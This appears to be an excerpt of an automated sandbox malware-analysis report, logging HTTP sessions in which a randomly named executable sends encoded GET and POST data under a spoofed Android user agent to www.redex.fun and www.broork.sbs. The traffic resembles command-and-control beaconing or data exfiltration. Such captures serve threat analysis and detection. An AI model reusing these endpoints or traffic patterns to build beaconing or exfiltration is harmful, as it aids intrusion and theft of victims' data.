                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 72 54 51 56 4f 45 74 2f 75 58 2b 2b 44 50 65 78 6d 43 42 6b 62 51 6d 79 65 2f 2f 6a 48 33 44 5a 50 62 4c 4e 41 6f 61 4b 64 30 76 63 53 67 6e 64 38 67 4b 74 37 49 50 6a 4e 73 58 4a 72 6e 6a 52 68 71 6e 6d 32 6c 42 6f 42 69 34 5a 54 42 35 4e 38 57 51 30 70 6d 42 38 51 63 74 32 6e 35 45 2b 6c 4f 73 6f 4f 2b 31 39 44 42 6d 39 63 46 69 6d 67 72 32 32 55 70 42 68 37 44 4b 62 6c 45 41 41 2f 48 2f 44 71 4b 6d 31 65 77 34 73 36 6c 62 57 2b 72 58 63 39 6a 2b 47 37 45 76 48 6a 69 78 6b 6f 55 30 4b 31 54 39 65 64 4d 69 76 75 56 4e 55 4c 55 4e 58 5a 62 2b 4d 66 2f 69 62 78 73 53 39 64 2b 76 43 69 6c 76 69 6d 56 50 39 45 5a 7a 43 6d 4c 41 6c 62 2b 74 55 53 65 63 76 51 48 50 79 37 6f 4c 61 55 43 43 72 36 71 2b 38 41 6c 6d 44 37 58 71 72 56 35 4b 37 78 71 78 57 6f 41 30 36 32 6d 4e 33 72 4a 62 38 30 39 33 49 52 6e 74 58 6c 67 36 73 65 77 45 67 38 52 63 69 68 70 64 52 6c 56 4d 49 35 74 69 54 48 79 5a 78 57 65 65 5a 4e 6e 35 7a 74 41 75 55 67 70 32 59 57 79 38 4c 4b 49 41 2b 35 78 5a 79 34 76 56 46 [TRUNCATED]
                                                                                                                              Data Ascii: Z0WTZ=rTQVOEt/uX++DPexmCBkbQmye//jH3DZPbLNAoaKd0vcSgnd8gKt7IPjNsXJrnjRhqnm2lBoBi4ZTB5N8WQ0pmB8Qct2n5E+lOsoO+19DBm9cFimgr22UpBh7DKblEAA/H/DqKm1ew4s6lbW+rXc9j+G7EvHjixkoU0K1T9edMivuVNULUNXZb+Mf/ibxsS9d+vCilvimVP9EZzCmLAlb+tUSecvQHPy7oLaUCCr6q+8AlmD7XqrV5K7xqxWoA062mN3rJb8093IRntXlg6sewEg8RcihpdRlVMI5tiTHyZxWeeZNn5ztAuUgp2YWy8LKIA+5xZy4vVFmznHzRxPYB+k6ouS8da8JwFFPKOVM3Gn4cZKGGq7U/fxejxdJDe6O7hcd4xlOx69S72pp7mLL8e6DBPCrJiU6F1PR9t6vEvE167uBiBxLETyXFHgDmNiq8J1Z2NGgteyOa090Iq5DrUc6pPSAE2EX7N1x8O+BDMTScNSdmd5KM1EYdHEpqHkCGKJlmjQ7ZEJAgt0OBTuUhC44PoYsC5SQW253lF4ADczgUIZf0JQMqk8boruh2Dq/r1bvXnwVDyw+ZGlqhuKIj33b4qNQCutUGyLnz1pFRfyLmKCV9PFohNY39rICJKtd0DvtBAQvqNFM9QvQ6PaY0k9q5waRj1eoH7C57E12+l9NmD2Oj77ndiT+5wkcfF+//Tp3FcNKNcTwDCFrEwe2UWvI5UhrkKR1NTUNaEtFQYYlUtz6/2ylt67ZXIpNdI5xL0PCd/fN5dXgEYULpMkgLvdFOjuuHs52kUN0LWfswoEaro8E+w0gaVdsEncio13bWx4eqSZPegmrX85CIv+snF/UZLOxtCXeZDI3h06b0et1w+bYwHsQNhheaCXjkY+ljEDyCoZAzoLLbWqFM4J6C+4Uwf9Ltmvfp6QxpKnw23Kd6lfT8mvVd+IRvMTO058KqD1QYuuro2lQxNZWUbbG1q7iYmhL7SIKeSlsND1phUWA3 [TRUNCATED]
                                                                                                                              Nov 2, 2024 08:14:10.455612898 CET332INHTTP/1.1 405 Not Allowed
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:14:10 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              x-ray: p529:0.000
                                                                                                                              Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              36192.168.2.449376185.68.16.94803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:12.065160990 CET522OUTGET /pjcb/?SJuP9=UPQLWRgHAD_&Z0WTZ=mR41NwlPpWSeNv3ogRNiaiaxYZXyC1SkAJjbD/qSc2ukVSLu6jyn16P/AoWnmXjc847+20hqOz4nW3sR+UY1qAEpIZA0h6plj49hN8QYEBC/SES4lZybD8k= HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.redex.fun
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:14:12.999943972 CET1236INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:14:12 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              x-ray: p529:0.000
                                                                                                                              Data Raw: 31 37 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 54 49 54 4c 45 3e d0 a1 d0 b0 d0 b9 d1 82 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 d0 bd d0 b5 20 d0 bd d0 b0 d1 81 d1 82 d1 80 d0 be d0 b5 d0 bd 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 b5 3c 2f 54 49 54 4c 45 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 64 6d 2e 74 6f 6f 6c 73 2f 70 61 72 6b 69 6e 67 2d 70 61 67 65 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 [TRUNCATED]
                                                                                                                              Data Ascii: 17d0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "xhtml11.dtd"><html><head> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8" /> <TITLE> www.redex.fun </TITLE> <link rel="stylesheet" href="https://cdn.adm.tools/parking-page/style.css" type="text/css" /> <script> window.languages = { 'en': { 'title': 'Website www.redex.fun not configured on server', 'h1': 'Website www.redex.fun not configured on server', '.message1': 'Website <b>www.redex.fun</b> is not configured on the hosting server.', '.message2': 'Domain address record points to our server, but this site is not served.<br>If you have recently added a site to your control panel - wait 15 minutes and your site will start working.', '.help_button': 'How can I fix this?', }, 'pl': { 'title': 'Witryna www.redex.fun niesko [TRUNCATED]
                                                                                                                              Nov 2, 2024 08:14:12.999978065 CET212INData Raw: 61 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 6e 69 65 73 6b 6f 6e 66 69 67 75 72 6f 77 61 6e 61 20 6e 61 20 73 65 72 77 65 72 7a 65 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61 67 65 31 27 3a 20 27 57 69 74 72
                                                                                                                              Data Ascii: a www.redex.fun nieskonfigurowana na serwerze', '.message1': 'Witryna <b>www.redex.fun</b> nie jest skonfigurowana na serwerze hostingowym.', '.message2': 'Rekord adresu domeny wsk
                                                                                                                              Nov 2, 2024 08:14:12.999990940 CET1236INData Raw: 61 7a 75 6a 65 20 6e 61 20 6e 61 73 7a 20 73 65 72 77 65 72 2c 20 61 6c 65 20 74 61 20 77 69 74 72 79 6e 61 20 6e 69 65 20 6a 65 73 74 20 6f 62 73 c5 82 75 67 69 77 61 6e 61 2e 3c 62 72 3e 4a 65 c5 9b 6c 69 20 6e 69 65 64 61 77 6e 6f 20 64 6f 64
                                                                                                                              Data Ascii: azuje na nasz serwer, ale ta witryna nie jest obsugiwana.<br>Jeli niedawno dodae witryn do panelu sterowania - poczekaj 15 minut, a Twoja witryna zacznie dziaa.', '.help_button': 'Jak mog to naprawi?',
                                                                                                                              Nov 2, 2024 08:14:13.000019073 CET1236INData Raw: 67 65 32 27 3a 20 27 d0 90 d0 b4 d1 80 d0 b5 d1 81 d0 bd d0 b8 d0 b9 20 d0 b7 d0 b0 d0 bf d0 b8 d1 81 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d1 83 20 d0 bf d0 be d1 81 d0 b8 d0 bb d0 b0 d1 94 d1 82 d1 8c d1 81 d1 8f 20 d0 bd d0 b0 20 d0 bd d0 b0 d1 88
                                                                                                                              Data Ascii: ge2': ' , .<br>
                                                                                                                              Nov 2, 2024 08:14:13.000034094 CET1236INData Raw: bd d0 b5 20 d0 bd d0 b0 d1 81 d1 82 d1 80 d0 be d0 b5 d0 bd 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 b5 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 d0 b0 2e 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 6d 65 73
                                                                                                                              Data Ascii: .', '.message2': ' , .<br>
                                                                                                                              Nov 2, 2024 08:14:13.000050068 CET636INData Raw: 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 20 64 69 73 70 6c 61 79 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d
                                                                                                                              Data Ascii: entListener("DOMContentLoaded", display); </script></head><body><div class="container"> <div class="content"> <div class="text"> <h1> www.redex.fun </h1>
                                                                                                                              Nov 2, 2024 08:14:13.000062943 CET486INData Raw: 20 d1 81 d0 b0 d0 b9 d1 82 20 d0 b2 20 d0 bf d0 b0 d0 bd d0 b5 d0 bb d1 8c 20 d1 83 d0 bf d1 80 d0 b0 d0 b2 d0 bb d0 b5 d0 bd d0 b8 d1 8f 20 2d 20 d0 bf d0 be d0 b4 d0 be d0 b6 d0 b4 d0 b8 d1 82 d0 b5 20 31 35 20 d0 bc d0 b8 d0 bd d1 83 d1 82 20
                                                                                                                              Data Ascii: - 15 . </p> <a class="help_button" href="https://www.ukraine.com.ua/wiki/hosting/


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              37192.168.2.449377163.44.176.12803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:18.761945009 CET777OUTPOST /51fd/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.broork.sbs
                                                                                                                              Origin: http://www.broork.sbs
                                                                                                                              Referer: http://www.broork.sbs/51fd/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 30 56 37 42 66 4b 51 68 55 73 4b 76 35 39 47 56 4a 54 2b 6f 72 4b 55 66 73 52 61 35 79 56 50 48 78 64 73 58 31 7a 64 71 39 35 33 5a 33 35 2b 75 66 65 77 68 66 6d 76 52 58 6e 4a 72 41 43 45 51 53 6c 65 47 66 52 6f 38 2f 6b 69 4e 43 38 76 33 32 4b 75 64 52 76 42 63 6d 47 65 66 50 69 4f 73 4a 39 4d 33 55 66 41 50 6e 75 67 45 64 33 72 58 2f 79 6d 42 4e 43 38 54 6d 39 4b 63 50 4e 71 44 4c 65 76 39 6f 73 52 57 43 56 6f 69 52 57 4a 78 69 35 4a 78 65 48 62 4f 52 37 51 30 62 46 4f 58 39 75 57 31 68 36 73 5a 6e 62 72 6d 41 66 69 77 50 63 4c 55 61 67 78 6d 43 44 74 38 73 35 62 61 2b 67 3d 3d
                                                                                                                              Data Ascii: Z0WTZ=0V7BfKQhUsKv59GVJT+orKUfsRa5yVPHxdsX1zdq953Z35+ufewhfmvRXnJrACEQSleGfRo8/kiNC8v32KudRvBcmGefPiOsJ9M3UfAPnugEd3rX/ymBNC8Tm9KcPNqDLev9osRWCVoiRWJxi5JxeHbOR7Q0bFOX9uW1h6sZnbrmAfiwPcLUagxmCDt8s5ba+g==
                                                                                                                              Nov 2, 2024 08:14:19.625241041 CET1236INHTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 1251
                                                                                                                              date: Sat, 02 Nov 2024 07:14:19 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              vary: User-Agent
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
                                                                                                                              Nov 2, 2024 08:14:19.625253916 CET271INData Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20
                                                                                                                              Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              38192.168.2.449378163.44.176.12803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:21.305398941 CET797OUTPOST /51fd/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.broork.sbs
                                                                                                                              Origin: http://www.broork.sbs
                                                                                                                              Referer: http://www.broork.sbs/51fd/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 30 56 37 42 66 4b 51 68 55 73 4b 76 32 39 32 56 4d 30 43 6f 74 71 55 63 69 78 61 35 37 31 4f 4f 78 64 67 58 31 79 5a 36 36 4d 48 5a 33 59 4f 75 65 63 49 68 59 6d 76 52 66 48 49 68 45 43 45 58 53 6c 53 30 66 54 4d 38 2f 6b 6d 4e 43 39 66 33 32 35 32 65 51 2f 42 53 75 6d 65 64 41 43 4f 73 4a 39 4d 33 55 62 6f 70 6e 75 34 45 64 47 62 58 38 57 4b 43 53 79 38 4d 78 4e 4b 63 4c 4e 71 48 4c 65 75 6f 6f 74 63 37 43 58 41 69 52 58 35 78 6a 73 6c 79 56 48 62 49 4f 72 52 67 63 58 72 79 35 2f 6e 61 6a 4d 45 71 69 4f 50 52 46 5a 76 71 65 74 71 44 49 67 56 56 66 45 6b 49 68 36 6d 54 6c 6f 73 4e 6a 31 4e 6b 37 42 76 43 51 35 34 68 66 6c 4a 48 39 53 41 3d
                                                                                                                              Data Ascii: Z0WTZ=0V7BfKQhUsKv292VM0CotqUcixa571OOxdgX1yZ66MHZ3YOuecIhYmvRfHIhECEXSlS0fTM8/kmNC9f3252eQ/BSumedACOsJ9M3Ubopnu4EdGbX8WKCSy8MxNKcLNqHLeuootc7CXAiRX5xjslyVHbIOrRgcXry5/najMEqiOPRFZvqetqDIgVVfEkIh6mTlosNj1Nk7BvCQ54hflJH9SA=
                                                                                                                              Nov 2, 2024 08:14:22.198544025 CET1236INHTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 1251
                                                                                                                              date: Sat, 02 Nov 2024 07:14:22 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              vary: User-Agent
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
                                                                                                                              Nov 2, 2024 08:14:22.198559046 CET271INData Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20
                                                                                                                              Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              39192.168.2.449379163.44.176.12803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:23.857414961 CET10879OUTPOST /51fd/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.broork.sbs
                                                                                                                              Origin: http://www.broork.sbs
                                                                                                                              Referer: http://www.broork.sbs/51fd/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 30 56 37 42 66 4b 51 68 55 73 4b 76 32 39 32 56 4d 30 43 6f 74 71 55 63 69 78 61 35 37 31 4f 4f 78 64 67 58 31 79 5a 36 36 4e 54 5a 32 75 61 75 66 39 49 68 5a 6d 76 52 65 48 49 73 45 43 45 47 53 6c 4c 2f 66 54 78 42 2f 6d 75 4e 51 50 58 33 2b 6f 32 65 4a 50 42 53 69 47 65 63 50 69 4f 63 4a 39 63 7a 55 66 4d 70 6e 75 34 45 64 46 7a 58 71 79 6d 43 51 79 38 54 6d 39 4b 41 50 4e 71 6a 4c 65 6d 34 6f 74 49 4e 43 6d 67 69 52 33 70 78 6b 61 52 79 57 6e 62 4b 4e 72 52 6f 63 58 58 68 35 37 2f 38 6a 49 4e 69 69 49 7a 52 4a 63 4f 2b 4f 63 43 68 51 47 52 79 4d 57 38 2f 75 5a 43 72 6a 62 59 7a 72 67 4a 57 35 54 72 49 62 4a 52 78 43 58 39 34 75 6c 37 32 6b 73 63 2f 73 4a 6e 76 76 54 6e 68 57 47 2b 58 59 70 34 67 54 5a 30 4c 49 33 31 63 2b 59 46 38 6f 72 4a 63 63 6a 53 2b 53 39 4e 76 51 49 65 54 62 4b 68 79 51 75 77 76 6d 4d 4f 61 49 54 4f 66 48 7a 38 45 71 4b 76 31 64 75 55 42 53 32 62 32 75 33 57 75 32 59 73 69 67 58 6b 68 6d 41 37 65 6a 77 68 59 38 63 6c 44 39 73 38 75 72 76 32 6a 68 71 72 55 [TRUNCATED]
                                                                                                                              Data Ascii: Z0WTZ=0V7BfKQhUsKv292VM0CotqUcixa571OOxdgX1yZ66NTZ2uauf9IhZmvReHIsECEGSlL/fTxB/muNQPX3+o2eJPBSiGecPiOcJ9czUfMpnu4EdFzXqymCQy8Tm9KAPNqjLem4otINCmgiR3pxkaRyWnbKNrRocXXh57/8jINiiIzRJcO+OcChQGRyMW8/uZCrjbYzrgJW5TrIbJRxCX94ul72ksc/sJnvvTnhWG+XYp4gTZ0LI31c+YF8orJccjS+S9NvQIeTbKhyQuwvmMOaITOfHz8EqKv1duUBS2b2u3Wu2YsigXkhmA7ejwhY8clD9s8urv2jhqrUG3cuW+ebwmlqjY7tsdKObCWBjHBy0HXS2Ej8RwqK3l1824od6Vrn6DSR7cvmfVMg0z6zBrxYky72V4sdWYQbD6hSjA/G7LSOnp//zl7P7RSb1UXNsoF8H5LwcY4kI4w1VMA5TkLxfBWguUPVQjxGzUM5mj6echTt2EKujsXu94gw00E9M7Khr4esS+8iE/BD5DazliVZIS+ait7nS4j1jsBmMssFrT4PXIVjK6pdvfkh3suRXdaJcy53gJJDAp9OtB7+0QllbzfLFAJIajyV+bVY+B+2KVu0MOnr6cDgcthYK3n/Wuww01FAcQ56luszvxmRhXLZqxAHhfiinjPq701T70ypNy/hGPSxJODVZ+oW+CzApNghiBihfqRNKDu/NzKxMucm9QxAX+8gloGz6bDCWczN1ceCWobnRvtbeuX/iqirV/vOadVRLO239/btAdrv2Xo432CWURkUwQDU7+YC8YmGFBjx/L7fJWLQ7mZOT0pzrdf1nSVKX2ScYa6q9dGP8LIbIFQggzn26eTi/PwJRfiwp2N3bMLfvDlF9hUnzi/myiIz+rHpTp0PR7CjK3xBnKIQcqrQZK/OLfg73COuAu5fKev7L+kduFjJEKIZyOTXI4Ubl7pEHllIvuw7VUeID7t2H5IhYRHWE8Gwl4g8Jd53gf2ZZ7 [TRUNCATED]
                                                                                                                              Nov 2, 2024 08:14:24.717592955 CET1236INHTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
